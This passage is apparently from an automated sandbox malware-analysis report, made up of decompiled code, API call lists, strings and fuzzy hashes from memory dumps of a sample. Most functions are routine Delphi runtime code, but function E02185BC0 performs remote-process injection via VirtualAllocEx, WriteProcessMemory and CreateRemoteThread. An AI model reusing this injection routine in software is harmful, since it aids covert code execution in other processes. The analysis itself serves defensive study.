                                                                                                					_t79 = 0;
                                                                                                					_v112652 = 0;
                                                                                                					_v112645 = 1;
                                                                                                					_t180 =  *0x2191704; // 0x4a30000
                                                                                                					goto L12;
                                                                                                				}
                                                                                                			}

                                                                                                0x02172909
                                                                                                0x02172909
                                                                                                0x021726ab
                                                                                                0x021726b4
                                                                                                0x021726cf
                                                                                                0x021726d1
                                                                                                0x021726db
                                                                                                0x021726eb
                                                                                                0x021726f1
                                                                                                0x021726fd
                                                                                                0x02172703
                                                                                                0x0217270a
                                                                                                0x02172715
                                                                                                0x02172717
                                                                                                0x02172728
                                                                                                0x02172735
                                                                                                0x02172748
                                                                                                0x0217274a
                                                                                                0x0217274a
                                                                                                0x02172758
                                                                                                0x021727a9
                                                                                                0x021727ac
                                                                                                0x021727ad
                                                                                                0x021727b0
                                                                                                0x021727b0
                                                                                                0x0217275a
                                                                                                0x0217275a
                                                                                                0x0217275e
                                                                                                0x02172770
                                                                                                0x02172772
                                                                                                0x02172775
                                                                                                0x02172776
                                                                                                0x0217277a
                                                                                                0x0217279e
                                                                                                0x021727a0
                                                                                                0x021727a0
                                                                                                0x021727b3
                                                                                                0x021727b6
                                                                                                0x021727cd
                                                                                                0x021727b8
                                                                                                0x021727b8
                                                                                                0x021727e2
                                                                                                0x021727ba
                                                                                                0x021727ef
                                                                                                0x02172808
                                                                                                0x02172808
                                                                                                0x021727b8
                                                                                                0x0217280a
                                                                                                0x0217280d
                                                                                                0x0217280e
                                                                                                0x02172812
                                                                                                0x0217281f
                                                                                                0x0217281f
                                                                                                0x02172821
                                                                                                0x02172822
                                                                                                0x02172828
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02172828
                                                                                                0x0217282e
                                                                                                0x02172834
                                                                                                0x0217283a
                                                                                                0x02172844
                                                                                                0x0217284b
                                                                                                0x0217284b
                                                                                                0x0217284b
                                                                                                0x0217285e
                                                                                                0x021728da
                                                                                                0x021728e6
                                                                                                0x021728fe
                                                                                                0x00000000
                                                                                                0x021728fe
                                                                                                0x02172867
                                                                                                0x02172869
                                                                                                0x0217286c
                                                                                                0x0217286d
                                                                                                0x02172870
                                                                                                0x02172871
                                                                                                0x02172874
                                                                                                0x02172875
                                                                                                0x02172878
                                                                                                0x02172878
                                                                                                0x0217288a
                                                                                                0x02172892
                                                                                                0x02172895
                                                                                                0x02172897
                                                                                                0x02172898
                                                                                                0x021728a2
                                                                                                0x00000000
                                                                                                0x021728a8
                                                                                                0x021728af
                                                                                                0x021728b1
                                                                                                0x021728b4
                                                                                                0x021728b5
                                                                                                0x021728b8
                                                                                                0x021728b8
                                                                                                0x021728c2
                                                                                                0x021728cc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x021728ce
                                                                                                0x021728d4
                                                                                                0x021728d7
                                                                                                0x021728d8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x021728d8
                                                                                                0x02172569
                                                                                                0x02172569
                                                                                                0x0217256f
                                                                                                0x02172570
                                                                                                0x02172571
                                                                                                0x00000000
                                                                                                0x02172573
                                                                                                0x0217258c
                                                                                                0x0217259e
                                                                                                0x021725a3
                                                                                                0x021725a5
                                                                                                0x021725ab
                                                                                                0x021725b2
                                                                                                0x00000000
                                                                                                0x021725b2

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message
                                                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                • API String ID: 2030045667-32948583
                                                                                                • Opcode ID: 26c550ffc565c0545fbd0777de15bf6f0a4dd5dba8d8d243278a49550e8234dc
                                                                                                • Instruction ID: a4c42593d7e010d87798e9138239a4735662dd16869920f8959574b04ad21e21
                                                                                                • Opcode Fuzzy Hash: 26c550ffc565c0545fbd0777de15bf6f0a4dd5dba8d8d243278a49550e8234dc
                                                                                                • Instruction Fuzzy Hash: A9A1D730A842648FDF219A2CC884BD9B6F5EB89710F1441F5ED49AB346CB7589C7CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 80%
                                                                                                			E02173154(void** __eax) {
                                                                                                				long _t29;
                                                                                                				void* _t31;
                                                                                                				long _t34;
                                                                                                				void* _t38;
                                                                                                				void* _t40;
                                                                                                				long _t41;
                                                                                                				int _t44;
                                                                                                				void* _t46;
                                                                                                				long _t54;
                                                                                                				long _t55;
                                                                                                				void* _t58;
                                                                                                				void** _t59;
                                                                                                				DWORD* _t60;
                                                                                                
                                                                                                				_t59 = __eax;
                                                                                                				 *((intOrPtr*)(__eax + 0xc)) = 0;
                                                                                                				 *((intOrPtr*)(__eax + 0x10)) = 0;
                                                                                                				if(0xffffffffffff284f == 0) {
                                                                                                					_t29 = 0x80000000;
                                                                                                					_t55 = 1;
                                                                                                					_t54 = 3;
                                                                                                					 *((intOrPtr*)(__eax + 0x1c)) = 0x21730a8;
                                                                                                				} else {
                                                                                                					if(0xffffffffffff284f == 0) {
                                                                                                						_t29 = 0x40000000;
                                                                                                						_t55 = 1;
                                                                                                						_t54 = 2;
                                                                                                					} else {
                                                                                                						if(0xffffffffffff284f != 0) {
                                                                                                							return 0xffffffffffff284d;
                                                                                                						}
                                                                                                						_t29 = 0xc0000000;
                                                                                                						_t55 = 1;
                                                                                                						_t54 = 3;
                                                                                                					}
                                                                                                					_t59[7] = E021730E8;
                                                                                                				}
                                                                                                				_t59[9] = E02173134;
                                                                                                				_t59[8] = E021730E4;
                                                                                                				if(_t59[0x12] == 0) {
                                                                                                					_t59[2] = 0x80;
                                                                                                					_t59[9] = E021730E4;
                                                                                                					_t59[5] =  &(_t59[0x53]);
                                                                                                					if(_t59[1] == 0xd7b2) {
                                                                                                						if(_t59 != 0x21913e0) {
                                                                                                							_t31 = GetStdHandle(0xfffffff5);
                                                                                                						} else {
                                                                                                							_t31 = GetStdHandle(0xfffffff4);
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t31 = GetStdHandle(0xfffffff6);
                                                                                                					}
                                                                                                					if(_t31 == 0xffffffff) {
                                                                                                						goto L37;
                                                                                                					}
                                                                                                					 *_t59 = _t31;
                                                                                                					goto L30;
                                                                                                				} else {
                                                                                                					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
                                                                                                					if(_t38 == 0xffffffff) {
                                                                                                						L37:
                                                                                                						_t59[1] = 0xd7b0;
                                                                                                						return GetLastError();
                                                                                                					}
                                                                                                					 *_t59 = _t38;
                                                                                                					if(_t59[1] != 0xd7b3) {
                                                                                                						L30:
                                                                                                						if(_t59[1] == 0xd7b1) {
                                                                                                							L34:
                                                                                                							return 0;
                                                                                                						}
                                                                                                						_t34 = GetFileType( *_t59);
                                                                                                						if(_t34 == 0) {
                                                                                                							CloseHandle( *_t59);
                                                                                                							_t59[1] = 0xd7b0;
                                                                                                							return 0x69;
                                                                                                						}
                                                                                                						if(_t34 == 2) {
                                                                                                							_t59[8] = E021730E8;
                                                                                                						}
                                                                                                						goto L34;
                                                                                                					}
                                                                                                					_t59[1] = _t59[1] - 1;
                                                                                                					_t40 = GetFileSize( *_t59, 0) + 1;
                                                                                                					if(_t40 == 0) {
                                                                                                						goto L37;
                                                                                                					}
                                                                                                					_t41 = _t40 - 0x81;
                                                                                                					if(_t41 < 0) {
                                                                                                						_t41 = 0;
                                                                                                					}
                                                                                                					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
                                                                                                						goto L37;
                                                                                                					} else {
                                                                                                						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
                                                                                                						_t58 = 0;
                                                                                                						if(_t44 != 1) {
                                                                                                							goto L37;
                                                                                                						}
                                                                                                						_t46 = 0;
                                                                                                						while(_t46 < _t58) {
                                                                                                							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
                                                                                                								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
                                                                                                									goto L37;
                                                                                                								} else {
                                                                                                									goto L30;
                                                                                                								}
                                                                                                							}
                                                                                                							_t46 = _t46 + 1;
                                                                                                						}
                                                                                                						goto L30;
                                                                                                					}
                                                                                                				}
                                                                                                			}

















                                                                                                APIs
                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 021731DC
                                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02173200
                                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0217321C
                                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 0217323D
                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 02173266
                                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 02173274
                                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 021732AF
                                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 021732C5
                                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 021732E0
                                                                                                • GetLastError.KERNEL32(000000F5), ref: 021732F8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                • String ID:
                                                                                                • API String ID: 1694776339-0
                                                                                                • Opcode ID: 968b9605401b7570bb3110d60887c52bf16fd87788ea7977957d688a8720f37d
                                                                                                • Instruction ID: fd2e4c89ac30db3e19722ae508ea40d057ca1be12d7f8615f7d373e95b7c4c84
                                                                                                • Opcode Fuzzy Hash: 968b9605401b7570bb3110d60887c52bf16fd87788ea7977957d688a8720f37d
                                                                                                • Instruction Fuzzy Hash: AA41F3302C0391AEE7309F348905B2376F1EBD1754F208A99D0FA8A5D0D7319581AB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 98%
                                                                                                			E0217255E(void* __eax) {
                                                                                                				void* _v8;
                                                                                                				char _v110600;
                                                                                                				char _v112644;
                                                                                                				char _v112645;
                                                                                                				signed int _v112652;
                                                                                                				char _v112653;
                                                                                                				char _v112654;
                                                                                                				char _v112660;
                                                                                                				intOrPtr _v112664;
                                                                                                				intOrPtr _v112668;
                                                                                                				intOrPtr _v112672;
                                                                                                				struct HWND__* _v112676;
                                                                                                				signed short* _v112680;
                                                                                                				intOrPtr* _v112684;
                                                                                                				char _v129068;
                                                                                                				char _v131117;
                                                                                                				char _v161836;
                                                                                                				void* _v162091;
                                                                                                				signed char _v162092;
                                                                                                				void* _t73;
                                                                                                				int _t79;
                                                                                                				signed int _t126;
                                                                                                				int _t131;
                                                                                                				intOrPtr _t132;
                                                                                                				char* _t134;
                                                                                                				char* _t135;
                                                                                                				char* _t136;
                                                                                                				char* _t137;
                                                                                                				char* _t138;
                                                                                                				char* _t139;
                                                                                                				char* _t141;
                                                                                                				char* _t142;
                                                                                                				char* _t147;
                                                                                                				char* _t148;
                                                                                                				intOrPtr _t180;
                                                                                                				void* _t182;
                                                                                                				void* _t184;
                                                                                                				void* _t185;
                                                                                                				intOrPtr* _t188;
                                                                                                				intOrPtr* _t189;
                                                                                                				signed int _t194;
                                                                                                				void* _t198;
                                                                                                				void* _t200;
                                                                                                				void* _t214;
                                                                                                
                                                                                                				_t198 = _t200;
                                                                                                				_push(__eax);
                                                                                                				_t73 = 0x27;
                                                                                                				goto L2;
                                                                                                				L13:
                                                                                                				while(_t180 != 0x2191700) {
                                                                                                					_t79 = E02172078(_t180);
                                                                                                					_t131 = _t79;
                                                                                                					__eflags = _t131;
                                                                                                					if(_t131 == 0) {
                                                                                                						L12:
                                                                                                						_t180 =  *((intOrPtr*)(_t180 + 4));
                                                                                                						continue;
                                                                                                					} else {
                                                                                                						goto L5;
                                                                                                					}
                                                                                                					do {
                                                                                                						L5:
                                                                                                						_t194 =  *(_t131 - 4);
                                                                                                						__eflags = _t194 & 0x00000001;
                                                                                                						if((_t194 & 0x00000001) == 0) {
                                                                                                							__eflags = _t194 & 0x00000004;
                                                                                                							if(__eflags == 0) {
                                                                                                								__eflags = _v112652 - 0x1000;
                                                                                                								if(_v112652 < 0x1000) {
                                                                                                									_v112664 = (_t194 & 0xfffffff0) - 4;
                                                                                                									_t126 = E021723BC(_t131);
                                                                                                									__eflags = _t126;
                                                                                                									if(_t126 == 0) {
                                                                                                										_v112645 = 0;
                                                                                                										 *((intOrPtr*)(_t198 + _v112652 * 4 - 0x1f828)) = _v112664;
                                                                                                										_t18 =  &_v112652;
                                                                                                										 *_t18 = _v112652 + 1;
                                                                                                										__eflags =  *_t18;
                                                                                                									}
                                                                                                								}
                                                                                                							} else {
                                                                                                								E02172414(_t131, __eflags, _t198);
                                                                                                							}
                                                                                                						}
                                                                                                						_t79 = E02172054(_t131);
                                                                                                						_t131 = _t79;
                                                                                                						__eflags = _t131;
                                                                                                					} while (_t131 != 0);
                                                                                                					goto L12;
                                                                                                				}
                                                                                                				_t132 =  *0x21937a8; // 0x7f9f0000
                                                                                                				while(_t132 != 0x21937a4 && _v112652 < 0x1000) {
                                                                                                					_t79 = E021723BC(_t132 + 0x10);
                                                                                                					__eflags = _t79;
                                                                                                					if(_t79 == 0) {
                                                                                                						_v112645 = 0;
                                                                                                						_t79 = _v112652;
                                                                                                						 *((intOrPtr*)(_t198 + _t79 * 4 - 0x1f828)) = ( *(_t132 + 0xc) & 0xfffffff0) - 0xfffffffffffffff4;
                                                                                                						_t27 =  &_v112652;
                                                                                                						 *_t27 = _v112652 + 1;
                                                                                                						__eflags =  *_t27;
                                                                                                					}
                                                                                                					_t132 =  *((intOrPtr*)(_t132 + 4));
                                                                                                				}
                                                                                                				if(_v112645 != 0) {
                                                                                                					L49:
                                                                                                					return _t79;
                                                                                                				}
                                                                                                				_v112653 = 0;
                                                                                                				_v112668 = 0;
                                                                                                				_t134 = E02172210(0x28,  &_v161836);
                                                                                                				_v112660 = 0x37;
                                                                                                				_v112680 = 0x2190046;
                                                                                                				_v112684 =  &_v110600;
                                                                                                				do {
                                                                                                					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
                                                                                                					_v112654 = 0;
                                                                                                					_t182 = 0xff;
                                                                                                					_t188 = _v112684;
                                                                                                					while(_t134 <=  &_v131117) {
                                                                                                						if( *_t188 > 0) {
                                                                                                							if(_v112653 == 0) {
                                                                                                								_t134 = E02172210(0x27, _t134);
                                                                                                								_v112653 = 1;
                                                                                                							}
                                                                                                							if(_v112654 != 0) {
                                                                                                								 *_t134 = 0x2c;
                                                                                                								_t139 = _t134 + 1;
                                                                                                								 *_t139 = 0x20;
                                                                                                								_t140 = _t139 + 1;
                                                                                                								__eflags = _t139 + 1;
                                                                                                							} else {
                                                                                                								 *_t134 = 0xd;
                                                                                                								 *((char*)(_t134 + 1)) = 0xa;
                                                                                                								_t147 = E021720F4(_v112668 + 1, _t134 + 2);
                                                                                                								 *_t147 = 0x20;
                                                                                                								_t148 = _t147 + 1;
                                                                                                								 *_t148 = 0x2d;
                                                                                                								 *((char*)(_t148 + 1)) = 0x20;
                                                                                                								_t140 = E02172210(8, E021720F4(_v112672, _t148 + 2));
                                                                                                								_v112654 = 1;
                                                                                                							}
                                                                                                							_t214 = _t182 - 1;
                                                                                                							if(_t214 < 0) {
                                                                                                								_t141 = E02172210(7, _t140);
                                                                                                							} else {
                                                                                                								if(_t214 == 0) {
                                                                                                									_t141 = E02172210(6, _t140);
                                                                                                								} else {
                                                                                                									E02173BD8( *((intOrPtr*)(_t188 - 4)),  &_v162092);
                                                                                                									_t141 = E02172210(_v162092 & 0x000000ff, _t140);
                                                                                                								}
                                                                                                							}
                                                                                                							 *_t141 = 0x20;
                                                                                                							_t142 = _t141 + 1;
                                                                                                							 *_t142 = 0x78;
                                                                                                							 *((char*)(_t142 + 1)) = 0x20;
                                                                                                							_t134 = E021720F4( *_t188, _t142 + 2);
                                                                                                						}
                                                                                                						_t182 = _t182 - 1;
                                                                                                						_t188 = _t188 - 8;
                                                                                                						if(_t182 != 0xffffffff) {
                                                                                                							continue;
                                                                                                						} else {
                                                                                                							goto L38;
                                                                                                						}
                                                                                                					}
                                                                                                					L38:
                                                                                                					_v112668 = _v112672;
                                                                                                					_v112684 = _v112684 + 0x800;
                                                                                                					_v112680 =  &(_v112680[0x10]);
                                                                                                					_t60 =  &_v112660;
                                                                                                					 *_t60 = _v112660 - 1;
                                                                                                				} while ( *_t60 != 0);
                                                                                                				if(_v112652 <= 0) {
                                                                                                					L48:
                                                                                                					E02172210(3, _t134);
                                                                                                					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
                                                                                                					goto L49;
                                                                                                				}
                                                                                                				if(_v112653 != 0) {
                                                                                                					 *_t134 = 0xd;
                                                                                                					_t136 = _t134 + 1;
                                                                                                					 *_t136 = 0xa;
                                                                                                					_t137 = _t136 + 1;
                                                                                                					 *_t137 = 0xd;
                                                                                                					_t138 = _t137 + 1;
                                                                                                					 *_t138 = 0xa;
                                                                                                					_t134 = _t138 + 1;
                                                                                                				}
                                                                                                				_t134 = E02172210(0x3c, _t134);
                                                                                                				_t184 = _v112652 - 1;
                                                                                                				if(_t184 >= 0) {
                                                                                                					_t185 = _t184 + 1;
                                                                                                					_v112676 = 0;
                                                                                                					_t189 =  &_v129068;
                                                                                                					L44:
                                                                                                					if(_v112676 != 0) {
                                                                                                						 *_t134 = 0x2c;
                                                                                                						_t135 = _t134 + 1;
                                                                                                						 *_t135 = 0x20;
                                                                                                						_t134 = _t135 + 1;
                                                                                                					}
                                                                                                					_t134 = E021720F4( *_t189, _t134);
                                                                                                					if(_t134 >  &_v131117) {
                                                                                                						goto L48;
                                                                                                					}
                                                                                                					_v112676 =  &(_v112676->i);
                                                                                                					_t189 = _t189 + 4;
                                                                                                					_t185 = _t185 - 1;
                                                                                                					if(_t185 != 0) {
                                                                                                						goto L44;
                                                                                                					}
                                                                                                				}
                                                                                                				L2:
                                                                                                				_t200 = _t200 + 0xfffff004;
                                                                                                				_push(_t73);
                                                                                                				_t73 = _t73 - 1;
                                                                                                				if(_t73 != 0) {
                                                                                                					goto L2;
                                                                                                				} else {
                                                                                                					E02173518( &_v112644, 0x1b800);
                                                                                                					E02173518( &_v129068, 0x4000);
                                                                                                					_t79 = 0;
                                                                                                					_v112652 = 0;
                                                                                                					_v112645 = 1;
                                                                                                					_t180 =  *0x2191704; // 0x4a30000
                                                                                                					goto L13;
                                                                                                				}
                                                                                                			}


                                                                                                Strings
                                                                                                • The unexpected small block leaks are:, xrefs: 02172737
                                                                                                • bytes: , xrefs: 0217278D
                                                                                                • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02172879
                                                                                                • Unexpected Memory Leak, xrefs: 021728F0
                                                                                                • An unexpected memory leak has occurred. , xrefs: 021726C0
                                                                                                • , xrefs: 02172844
                                                                                                • 7, xrefs: 021726D1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                • API String ID: 0-2723507874
                                                                                                • Opcode ID: 762de0104209bf90a51b3ef3c26c9c1784e2de2cf04f8a0605af55b7e62ab094
                                                                                                • Instruction ID: 280c05e43963657eec5c4194579ddf261893dbb90d7dac2e2d2f6e36e41987d2
                                                                                                • Opcode Fuzzy Hash: 762de0104209bf90a51b3ef3c26c9c1784e2de2cf04f8a0605af55b7e62ab094
                                                                                                • Instruction Fuzzy Hash: C071E630A842A88FDF219A2CC884BD9B6F5EB89700F2440E5DD49DB341DB758AC7CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 52%
                                                                                                			E02185BC0(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				char _v8;
                                                                                                				void* __ecx;
                                                                                                				void* _t22;
                                                                                                				void* _t27;
                                                                                                				intOrPtr _t34;
                                                                                                				void* _t37;
                                                                                                				intOrPtr _t40;
                                                                                                
                                                                                                				_push(_t27);
                                                                                                				_push(__ebx);
                                                                                                				_push(__esi);
                                                                                                				_v8 = __edx;
                                                                                                				_t37 = __eax;
                                                                                                				E02174D54(_v8);
                                                                                                				_push(_t40);
                                                                                                				_push(0x2185c73);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t40;
                                                                                                				 *0x21944dc = GetProcAddress(GetModuleHandleA("kernel32"), "Sleep");
                                                                                                				 *0x21944d4 = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
                                                                                                				 *0x21944d8 = E02185A40(_t37, 0, _t27, E02174D64(_v8), __edi, _t37);
                                                                                                				 *0x21944e0 = E02185B0C(_t37, 0x21944d4, E02185B8C, 0, 0xc);
                                                                                                				if( *0x21944e0 != 0) {
                                                                                                					_t22 =  *0x21944e0; // 0x0
                                                                                                					CloseHandle(_t22);
                                                                                                				}
                                                                                                				_pop(_t34);
                                                                                                				 *[fs:eax] = _t34;
                                                                                                				_push(E02185C7A);
                                                                                                				return E021748A0( &_v8);
                                                                                                			}











                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,02185C73), ref: 02185BED
                                                                                                • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02185BF3
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,02185C73), ref: 02185C07
                                                                                                • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02185C0D
                                                                                                  • Part of subcall function 02185A40: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,02185AC6,?,?,?,?,00000000,00000000,00000000), ref: 02185A80
                                                                                                  • Part of subcall function 02185A40: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,00000000,02185AC6), ref: 02185AA6
                                                                                                  • Part of subcall function 02185B0C: CreateRemoteThread.KERNEL32(?,00000000,00000000,04FA0000,04A80000,00000000,02194534), ref: 02185B58
                                                                                                  • Part of subcall function 02185B0C: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02185B68
                                                                                                  • Part of subcall function 02185B0C: ReadProcessMemory.KERNEL32(?,04A80000,?,?,02194530,00000000,000000FF), ref: 02185B7E
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,02185C73), ref: 02185C56
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Handle$AddressMemoryModuleProcProcess$AllocCloseCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                                                                                • String ID: LoadLibraryA$Sleep$kernel32
                                                                                                • API String ID: 3487503967-1813742806
                                                                                                • Opcode ID: b8b1990c512d809722e11607eb82028e5f6e81d581483fb401c4b099bcc0bce9
                                                                                                • Instruction ID: 23d48200aa457a9c514b10ebd021fb419accacac57552344ba2b70fdeec2fe7b
                                                                                                • Opcode Fuzzy Hash: b8b1990c512d809722e11607eb82028e5f6e81d581483fb401c4b099bcc0bce9
                                                                                                • Instruction Fuzzy Hash: BC115BB0AC0748BEE720FBA4D985A5E7BFFEB86704B924475E150AB200DB706D118F50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 72%
                                                                                                			E0217BF6C(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                				char _v8;
                                                                                                				char _v12;
                                                                                                				char _v16;
                                                                                                				char _v20;
                                                                                                				char _v24;
                                                                                                				char _v28;
                                                                                                				char _v32;
                                                                                                				char _v36;
                                                                                                				char _v40;
                                                                                                				char _v44;
                                                                                                				char _v48;
                                                                                                				char _v52;
                                                                                                				char _v56;
                                                                                                				char _v60;
                                                                                                				char _v64;
                                                                                                				char _v68;
                                                                                                				void* _t104;
                                                                                                				void* _t111;
                                                                                                				void* _t133;
                                                                                                				intOrPtr _t183;
                                                                                                				intOrPtr _t193;
                                                                                                				intOrPtr _t194;
                                                                                                
                                                                                                				_t191 = __esi;
                                                                                                				_t190 = __edi;
                                                                                                				_t193 = _t194;
                                                                                                				_t133 = 8;
                                                                                                				do {
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_t133 = _t133 - 1;
                                                                                                				} while (_t133 != 0);
                                                                                                				_push(__ebx);
                                                                                                				_push(_t193);
                                                                                                				_push(0x217c237);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t194;
                                                                                                				E0217BEA8();
                                                                                                				E0217AA6C(__ebx, __edi, __esi);
                                                                                                				_t196 =  *0x21938d0;
                                                                                                				if( *0x21938d0 != 0) {
                                                                                                					E0217AC44(__esi, _t196);
                                                                                                				}
                                                                                                				_t132 = GetThreadLocale();
                                                                                                				E0217A9B8(_t43, 0, 0x14,  &_v20);
                                                                                                				E021748F4(0x2193804, _v20);
                                                                                                				E0217A9B8(_t43, 0x217c24c, 0x1b,  &_v24);
                                                                                                				 *0x2193808 = E02177DC4(0x217c24c, 0, _t196);
                                                                                                				E0217A9B8(_t132, 0x217c24c, 0x1c,  &_v28);
                                                                                                				 *0x2193809 = E02177DC4(0x217c24c, 0, _t196);
                                                                                                				 *0x219380a = E0217AA04(_t132, 0x2c, 0xf);
                                                                                                				 *0x219380b = E0217AA04(_t132, 0x2e, 0xe);
                                                                                                				E0217A9B8(_t132, 0x217c24c, 0x19,  &_v32);
                                                                                                				 *0x219380c = E02177DC4(0x217c24c, 0, _t196);
                                                                                                				 *0x219380d = E0217AA04(_t132, 0x2f, 0x1d);
                                                                                                				E0217A9B8(_t132, "m/d/yy", 0x1f,  &_v40);
                                                                                                				E0217ACF4(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                                                                                				E021748F4(0x2193810, _v36);
                                                                                                				E0217A9B8(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                                                                                				E0217ACF4(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                                                                                				E021748F4(0x2193814, _v44);
                                                                                                				 *0x2193818 = E0217AA04(_t132, 0x3a, 0x1e);
                                                                                                				E0217A9B8(_t132, 0x217c280, 0x28,  &_v52);
                                                                                                				E021748F4(0x219381c, _v52);
                                                                                                				E0217A9B8(_t132, 0x217c28c, 0x29,  &_v56);
                                                                                                				E021748F4(0x2193820, _v56);
                                                                                                				E021748A0( &_v12);
                                                                                                				E021748A0( &_v16);
                                                                                                				E0217A9B8(_t132, 0x217c24c, 0x25,  &_v60);
                                                                                                				_t104 = E02177DC4(0x217c24c, 0, _t196);
                                                                                                				_t197 = _t104;
                                                                                                				if(_t104 != 0) {
                                                                                                					E02174938( &_v8, 0x217c2a4);
                                                                                                				} else {
                                                                                                					E02174938( &_v8, 0x217c298);
                                                                                                				}
                                                                                                				E0217A9B8(_t132, 0x217c24c, 0x23,  &_v64);
                                                                                                				_t111 = E02177DC4(0x217c24c, 0, _t197);
                                                                                                				_t198 = _t111;
                                                                                                				if(_t111 == 0) {
                                                                                                					E0217A9B8(_t132, 0x217c24c, 0x1005,  &_v68);
                                                                                                					if(E02177DC4(0x217c24c, 0, _t198) != 0) {
                                                                                                						E02174938( &_v12, 0x217c2c0);
                                                                                                					} else {
                                                                                                						E02174938( &_v16, 0x217c2b0);
                                                                                                					}
                                                                                                				}
                                                                                                				_push(_v12);
                                                                                                				_push(_v8);
                                                                                                				_push(":mm");
                                                                                                				_push(_v16);
                                                                                                				E02174C24();
                                                                                                				_push(_v12);
                                                                                                				_push(_v8);
